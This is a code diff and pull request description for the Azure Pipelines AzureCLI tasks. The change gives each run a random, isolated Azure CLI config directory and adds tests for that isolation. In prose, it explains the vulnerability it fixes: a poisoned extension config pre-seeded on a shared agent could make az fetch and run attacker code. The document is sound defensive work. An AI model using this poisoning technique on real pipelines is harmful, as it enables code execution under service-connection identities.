             console.warn(tl.loc('GlobalCliConfigAgentVersionWarning'));
         }

--- a/_generated/AzureCLIV3_Node24/src/AzureCliConfigDir.ts
+++ b/_generated/AzureCLIV3_Node24/src/AzureCliConfigDir.ts
@@ -1,0 +1,59 @@
+import * as fs from 'fs';
+import * as path from 'path';
+import * as tl from 'azure-pipelines-task-lib/task';
+
+/**
+ * AZURE_CONFIG_DIR isolation helper for the AzureCLI@1/@2/@3 tasks.
+ *
+ * NOTE: this file is intentionally duplicated under
+ * Tasks/AzureCLIV1/src, Tasks/AzureCLIV2/src and Tasks/AzureCLIV3/src.
+ * Each AzureCLI task is shipped as a self-contained npm package and the
+ * repo convention is to keep small, task-coupled helpers in the task
+ * folder rather than introduce a new shared package. Keep all three
+ * copies in sync when changing this file.
+ *
+ * Background: the legacy code pointed AZURE_CONFIG_DIR at the predictable
+ * path $(Agent.TempDirectory)/.azclitask which allowed any earlier
+ * pipeline step running on the same agent to pre-seed a poisoned `config`
+ * file (e.g. extension.index_url / use_dynamic_install /
+ * run_after_dynamic_install) and achieve code execution under the
+ * service-connection identity once the AzureCLI task subsequently invoked
+ * `az`. Creating a fresh, unpredictable directory per invocation closes
+ * that gap.
+ */
+
+/**
+ * Creates a per-invocation, unpredictable AZURE_CONFIG_DIR under the
+ * supplied agent temp directory. Returns the absolute path. The directory
+ * has the form `${agentTempDir}/.azclitask-XXXXXX` where XXXXXX is six
+ * cryptographically-random alphanumeric characters chosen by libuv
+ * (filesystem-safe on every supported OS).
+ */
+export function createPerInvocationAzureConfigDir(agentTempDir: string): string {
+    if (!agentTempDir) {
+        throw new Error('agentTempDir is required');
+    }
+    return fs.mkdtempSync(path.join(agentTempDir, '.azclitask-'));
+}
+
+/**
+ * Removes a directory previously created by
+ * createPerInvocationAzureConfigDir and unsets the AZURE_CONFIG_DIR env
+ * var. Safe to call in `finally` — never throws; logs to tl.debug on
+ * failure so a broken cleanup cannot mask the original task error.
+ */
+export function removePerInvocationAzureConfigDir(configPath: string | null | undefined): void {
+    if (!configPath) {
+        return;
+    }
+    tl.debug(`Removing per-invocation AZURE_CONFIG_DIR: ${configPath}`);
+    try {
+        tl.rmRF(configPath);
+    } catch (rmErr) {
+        const msg = (rmErr && (rmErr as Error).message) || String(rmErr);
+        tl.debug(`Failed to remove AZURE_CONFIG_DIR: ${msg}`);
+    }
+    try {
+        delete process.env['AZURE_CONFIG_DIR'];
+    } catch { /* ignore */ }
+}


### PR DESCRIPTION
## What this changes

AzureCLI@1/@2/@3 used to point `AZURE_CONFIG_DIR` at a fixed path under the agent temp directory (`Agent.TempDirectory/.azclitask`). On a shared self-hosted agent, an earlier pipeline step could pre-seed `.azclitask/config` with an attacker-controlled `[extension]` block — `index_url`, `use_dynamic_install`, `run_after_dynamic_install` — so that the next AzureCLI step's first `az` call would fetch and execute an attacker-controlled wheel under the service-connection identity. The end-of-task cleanup also operated on the same fixed path, so the attacker dir could be re-seeded across steps.

This PR moves all three task versions to a per-invocation, unpredictable config dir.

## How

Adds `Tasks/AzureCLI{V1,V2,V3}/src/AzureCliConfigDir.ts` (same content in each task — repo convention, see `argsSanitizer.ts`):

- `createPerInvocationAzureConfigDir(agentTempDir)` — uses `fs.mkdtempSync` to create `Agent.TempDirectory/.azclitask-XXXXXX` with a cryptographically random suffix (libuv tempchars, filesystem-safe on every supported OS). Available since Node 5.10 — well below every Node version the task handlers ship with.
- `removePerInvocationAzureConfigDir(path)` — never-throws cleanup (`tl.rmRF` + `delete process.env['AZURE_CONFIG_DIR']`) so cleanup errors can't mask the original task failure.

For V2 and V3, `scriptType.cleanUp()` in the `finally` block is now wrapped in its own try/catch so a cleanup error there can't prevent the config-dir cleanup from running.

## Behavior change for users

Cross-step persistence of `az extension add` / `az config set` between AzureCLI steps in the same job is no longer guaranteed — each step now gets a fresh, isolated config dir. The pre-existing `useGlobalConfig: true` input remains the supported escape hatch for pipelines that rely on persistence; recommended messaging in release notes.

No new task inputs, no feature flag, no public API change. Task-version pin is the rollback path if a regression is found.

## Tests

Adds `Tests/L0ConfigDirIsolation.ts` to each task — 8 L0 cases covering:

1. Directory is created on disk under the agent temp root
2. Two invocations produce different paths (unpredictability)
3. Two invocations are mutually isolated (no shared files)
4. New dir does not contain a pre-seeded `config` even if attacker has pre-populated the legacy path
5. Throws on empty/undefined `agentTempDir`
6. Cleanup removes a populated dir and unsets `AZURE_CONFIG_DIR`
7. Cleanup is a no-op for null/undefined/empty input (safe in `finally`)
8. Cleanup never throws when the path doesn't exist

Full L0 suite passes per task: V1 21 passing, V2 47 passing, V3 59 passing.

End-to-end verified on a self-hosted Windows agent: an attacker-pre-seeded `.azclitask/config` is untouched by the patched task; the task creates and uses `.azclitask-XXXXXX` instead.
